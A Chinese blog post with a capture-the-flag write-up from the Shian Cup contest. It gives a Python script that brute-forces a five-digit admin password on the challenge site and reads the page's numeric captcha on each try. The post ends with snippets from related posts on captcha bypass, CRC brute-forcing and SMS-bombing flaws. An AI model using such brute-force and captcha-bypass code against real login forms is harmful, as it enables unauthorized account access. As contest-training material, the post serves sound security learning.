爆破脚本+过验证码

最新推荐文章于 2025-03-31 11:26:39 发布
最新推荐文章于 2025-03-31 11:26:39 发布
阅读量5.2k 收藏 10
点赞数 1
文章标签: ctf 世安杯 爆破 验证码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wy_97/article/details/78198502
版权

原题链接:http://ctf1.shiyanbar.com/shian-s/

世安杯线上赛的一道题目,,,主要是仔细,,,查看源码

这就很明显了,爆破,坑点在于有验证码

脚本附在下面,,,

 

__author__="GETF"
import requests
import re
from requests.exceptions import RequestException



#第一次获取验证码
def D(s):
    url = "http://ctf1.shiyanbar.com/shian-s/"
    html=s.get(url)
    r = html.text.encode('ISO-8859-1').decode(html.apparent_encoding)
    pattern = re.compile(r'(\d)(\d)(\d)')
    code = pattern.findall(r)
    randcode = code[0][0] + code[0][1] + code[0][2]
    return randcode

def get_one_page(url,s):
    try:
        response=s.get(url=url)
        if response.status_code == 200:
#print(response.text)
            #print(response.encoding)
            #print(response.apparent_encoding)
            r=response.text
            #print(requests.utils.get_encodings_from_content(r)[0])
            #a=r.encode('ISO-8859-1').decode(requests.utils.get_encodings_from_content(r)[0])
            #print(a)
            print('------------------------------------')
            b = r.encode('ISO-8859-1').decode(response.apparent_encoding)
            if(len(b) != 145):
                print(b)
        return None
    except RequestException:
        return None

def main():
    for i in range(0,10):
        for j in range(0,10):
            for k in range(0,10):
                for m in range(0,10):
                    for n in range(0,10):
                        payload = '{0}{1}{2}{3}{4}'.format(i,j,k,m,n)
                        print(payload)
                        s = requests.session()
                        s.get("http://ctf1.shiyanbar.com/shian-s/")
                        randcode = D(s)
                        url = 'http://ctf1.shiyanbar.com/shian-s/index.php?username=admin&password={0}&randcode={1}'.format(payload,randcode)
                        get_one_page(url,s)

if __name__=='__main__':
        main()


 

 

 

 

【网络全】利用burp进行爆破(普通爆破+验证码爆破
你在看屏幕的同时,屏幕也在注视着你
06-08 6758
黑客爆破手法
Dedecms 后台自动识别验证码爆破脚本
weixin_39216626的博客
12-07 803
#!/usr/bin/env python # -*- coding:utf-8 -*- import requests import pytesseract from PIL import Image import re class DedeCMSLogin: def __init__(self, userid, pwd): self.vdcode = "" self.userid = userid self.pwd = pwd
【工具】-Misc-PNG图片高度宽度CRC爆破脚本
zxsctf的博客
02-05 5518
接下来第二行前8个hex数据都是表示宽高的:00 00 07 80 00 00 09 5F,这里表示宽度为07 80,高度为09 5F,这两组数据转换为10进制就是1920x2399。这里的CRC指的是CRC32,也就是PNG图片的一个效验位,是一种不可逆运算,类似于MD5,作为数据效验或效验文件的完整性使用。有的CTF题目会修改PNG图片的宽高,这在没有CRC检测的国内软件或Windows的图片看来是正常的。接下来的4组(16个)Hex组成的则是CRC校验码,我这里是13 97 08 36。
CTF--CRC宽高爆破脚本
Aluxian_的博客
10-23 910
【代码】CTF--CRC宽高爆破脚本
逻辑漏洞之短信轰炸,从零基础到精通,收藏这篇就够了!
最新发布
Python84310366的博客
03-31 817
本人在挖掘漏洞的过程中,遇到的逻辑漏洞还是比较多的,其中就有不少短信轰炸漏洞。今天就以我挖掘到的一些短信轰炸漏洞为例子,主要是分享一些思路,还请大佬们多多包涵。由于实际到真实厂商,对一些敏感信息进行了打码,大家伙看看思路即可。短信轰炸漏洞,顾名思义就是可以无限制地发送短信,原理由于短信业务逻辑设计缺陷,没对短信发送次数做限制,导致可以大量重复发送短信验证码。该漏洞会对其他用户造成骚扰或使厂商的运营商短信费用的增加,造成损失。
Burpsuite爆破之随机6位数验证码
dieqiang4646的博客
02-19 5949
Burpsuite爆破之随机6位数验证码-Random 0x01 找到Payload Options [Numbers] 设置number range 为 Random方式 注意:How many 只爆破多少个,不用全部爆破,这就是随机爆破的好处。 0x02设置Number format Max integer digits 设置为6Min fracti...
爆破CRC脚本文件x
01-16
爆破CRC脚本文件x
RabbitMQ【部署 01】一篇学会RabbitMQ服务依赖的下载装及简单使用(首次登录 User can only log in via localhost 问题处理)(1)
2301_77121488的博客
05-08 1119
也可以直接装rabbitmq-server从报错信息里获取需要的版本,由于是同一个网站,下载的方式是一样的,这次也是直接下载装文件。,朋友们如果有需要全套《网络全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~此时服务已经可以使用了,但是,默认情况下,RabbitMQ是没有装WEB端插件的,需要手动积获才可以生效。点击下载,可以进行联网下载装也可以直接进行下载,本次选择直接下载装文件。因篇幅有限,仅展示部分资料。还有大家最喜欢的黑客技术。
密码爆破---绕过验证码进行登录爆破
04-14
本文将详细介绍绕过验证码进行登录爆破的技术和实现原理。 验证码技术 验证码是一种基于图像识别的技术,旨在阻止机器自动提交表单或进行登录尝试。验证码通常是指在Web表单中嵌入的一幅图像,图像中包含一些随机...
绕过验证码爆破==>captcha-killer插件
zkaq7777777的博客
06-05 2165
想必大家都会使用burp进行爆破,当遇到带验证码的登录表单进行爆破时,基本尝试抓包后观察验证码是否主动更新,或者进行验证码绕过(我是十八期萌新,听风风说的有这个方法,但我还没学到),机缘巧合下我接触到了captcha-killer这个插件,可以提供给大家第三种爆破思路(我的插件和脚本打包放在文章附件了,插件也可以从GitHub下载)(https://github.com/c0ny1/captcha-killer “GitHub下载链接以及部分资料地址”)
python爆破脚本_多线程爆破脚本(python3)
weixin_39598941的博客
12-15 1368
#!/usr/bin/env python3# -*- coding: utf-8 -*-import loggingimport argparseimport queueimport requestsimport threadingimport osimport timeimport randomfrom html.parser import HTMLParserfrom requests.pa...
2022年最强万能crc32爆破脚本
04-11
2022年最强万能crc32爆破脚本,支持各种类型的图片格式例如:JPG、PNG、bmp、GIF等。
zip CRC攻击脚本
03-19
zip CRC攻击脚本 python版
有了这个网络全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 1506
还有兄弟不知道网络全面试可以提前刷题吗?费时一周整理的160+网络全面试题,金九银十,做网络全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
密码爆破脚本
weixin_34009794的博客
04-26 471
昨天遇到一个基于onethink开发的程序。源码是脱下来了。但是密码始终破解不了。来看看加密函数 function think_ucenter_md5($str, $key = 'ThinkUCenter'){ return '' === $str ? '' : md5(sha1($str) . $key); } if(is_array($user) && $us...
验证码爆破绕过
小刚的博客
04-02 8651
一,验证码目的: 区分用户是计算机和人 证明自己的身份,手机短信验证码,微信登录等 大多数的网站都会在很多地方设置各种验证码. 防止而已破解密码,刷票等,防止黑客对某一个特定的注册用户进行爆破。 二,验证码种类: 传统字符验证码: 由数字或者汉字组成的图片,通过添加各种噪点增加识别难度,可通过OCR技术进行破解 当验证码只有4位,可直接爆破数字验证码。 如果是6位,在半小时内无限制提交也可以暴力破...
2024年网络全最新CTF--CRC宽高爆破脚本_ctf crc(1),自学编程找工作
2401_84264536的博客
05-07 1290
还有兄弟不知道网络全面试可以提前刷题吗?费时一周整理的160+网络全面试题,金九银十,做网络全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
Python 代码实现验证码识别,很稳
xxue345678的博客
04-10 7254
Python所有方向路线就是把Python常用的技术点做整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。最新的面试资料,并且有阿里大佬给出了权威的解答,刷完这一套面试资料相信大家都能找到满意的工作。
验证码机制之验证码暴力破解
热门推荐
千寻的博客
11-02 1万+
验证码暴力破解介绍 通常在网站的用户注册、密码找回等页面会设计有手机或邮箱验证码进行验证。 主要为了贯彻落实上网实名制以及保障用户帐户的全性。 当这些验证码具有一定的规律性,并且没有做好对应的防护措施时, 会导致攻击者通过穷举或其它方式猜解岀验证码,从而对目标系统造成危害。 危害 恶意注册(任意用户注册、批量注册无用账户等) 重置任意用户密码 漏洞原理 短信验证码,下发流程: 测试示例 案例 通过暴力破解短信验证码实现重置任意用户密码 测试方法 1、接收验证码,观察验证码是否有规律性(如纯数字或
burpsuite绕过验证码爆破
09-08
根据引用内容,有两种方法可以使用Burpsuite绕过验证码进行爆破:免费版本和付费版本。在免费版本中,你可以下载相应的软件进行使用,但是可能会出现验证码识别错误的情况。而在付费版本中,你可以下载对应的插件并...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值